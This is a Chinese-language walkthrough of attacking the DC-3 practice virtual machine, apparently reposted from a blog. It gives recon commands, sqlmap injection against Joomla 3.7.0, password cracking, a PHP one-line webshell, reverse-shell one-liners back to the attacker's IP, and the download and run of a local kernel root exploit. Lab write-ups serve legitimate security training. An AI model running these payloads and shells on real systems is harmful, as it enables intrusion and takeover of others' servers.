DC-3靶机渗透详细教程(附靶机链接)

移动开发 2023-06-21 10:17:28 阅读次数: 0

靶机链接:https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg
提取码:0na8

首先查看本机kali的ip地址:192.168.159.145
ifconfig
在这里插入图片描述
利用nmap扫描靶机IP
nmap -sP 192.168.159.1/24
在这里插入图片描述
查看靶机mac地址
打开虚拟机设置,点击网络适配器——高级
在这里插入图片描述
根据靶机的mac地址匹配nmap的扫描结果确认靶机IP为192.168.159.141

使用nmap进行完整扫描
nmap -A 192.168.159.141 -p 1-65535 在这里插入图片描述发现80端口开放,尝试使用浏览器进行访问在这里插入图片描述
使用指纹识别
whatweb http://192.168.159.141/
在这里插入图片描述
结果显示靶机使用Apache平台,服务器为Ubuntu

使用joomscan进行扫描
joomscan --url http://192.168.159.141/
在这里插入图片描述
结果显示扫描出了网站后台,使用浏览器访问

http://192.168.159.141/administrator/在这里插入图片描述

网站后台为joomla 3.7.0模板
查找模板漏洞
searchsploit joomla 3.7.0
在这里插入图片描述
将结果拷贝至当前目录并查看
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomalv370_sqli.txt
cat joomalv370_sqli.txt
在这里插入图片描述
发现注入点
在这里插入图片描述
使用sqlmap列出数据库库名

sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
在这里插入图片描述
列出joomladb的所有表名
sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” --tables -p list[fullordering]
在这里插入图片描述
发现#_users表
列出users表的字段类型
sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]
在这里插入图片描述
列出账号密码
在这里插入图片描述
使用john工具破解密码
vim joom.txt
在这里插入图片描述
john joom.txt
在这里插入图片描述
结果显示密码为snoopy
进入后台发现
在这里插入图片描述
在这里插入图片描述
他告诉我们这次DC-3实战只有一个目标获得root权限
在这个目录下有一个beez3 的模板
在这里插入图片描述
在这里插入图片描述
进去之后我们发现有new file可以编辑文件,考虑上传木马
要上传木马,我们先要找到当前文件所在的目录
目录为http://192.168.159.141/templates/beez3/html/
在这里插入图片描述
回到刚才的页面点击new file
在html下创建一个php文件
在这里插入图片描述
编辑文件
在这里插入图片描述
这里一句话木马写错了,应该是@eval($_REQUEST[‘123’])
尝试访问这个文件,执行成功
在这里插入图片描述
使用蚁剑连接
在这里插入图片描述
右键连接打开虚拟终端
使用命令查看基本信息
在这里插入图片描述
反弹shell,kali本地监听
nc -lvvp 2333
蚁剑虚拟终端
nc -e /bin/bash 192.168.159.145 2333
-e参数不可用
执行命令
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.145 2333 >/tmp/f
在这里插入图片描述
可以知道当前靶机系统为Ubuntu 16.04
searchsploit ubuntu 16.04
在这里插入图片描述
复制文件
cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt
由于电脑无法访问国外网站,使用网盘下载exp
EXP资源
链接:https://pan.baidu.com/s/1AeuJrP-T6elka5aZP9KL9g
提取码:0fkw

注意此处不要解压压缩包
开启kali的apache2服务:service apache2 start
将文件复制到网页目录下:cp -r 39772 /var/www/html
在靶机执行命令 wget http://192.168.159.145/39772.zip

unzip 39772.zip
cd 39772
在这里插入图片描述
tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit
在这里插入图片描述
./compile.sh

./doubleput
在这里插入图片描述
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/bwt_D/article/details/121291921
今日推荐
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
美国拟限制 AI 大模型出口中国和俄罗斯
苹果将与 OpenAI 达成协议,将 ChatGPT 应用于 iPhone
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
报告:Django 仍然是 74% 开发者的首选
《2024 年一季度互联网投融资运行情况》研究报告
15 年前上了“FFmpeg 耻辱柱”,今天他还得谢谢咱——腾讯QQPlayer一雪前耻?
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
周排行
BPM为企业带来的实际利益
好程序员web前端分享css常用属性缩写
Java文件下载(excel)
css样式的动态添加及显示和隐藏等零碎用法
axios全局配置以及拦截器
使用Logstash来实时同步MySQL和log日志数据到ES
C++获取当前时间(年月日、时分秒、毫秒)
Odoo产品分析 (四) -- 工具板块(11) -- 网站即时聊天(1)
Java环境配置正确,但是java、javac、java -version均返回“不是内部或外部命令,也不是可运行的程序或批处理文件”?
01 官网下载各种CentOS教程(超详细版)
每日归档
更多
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022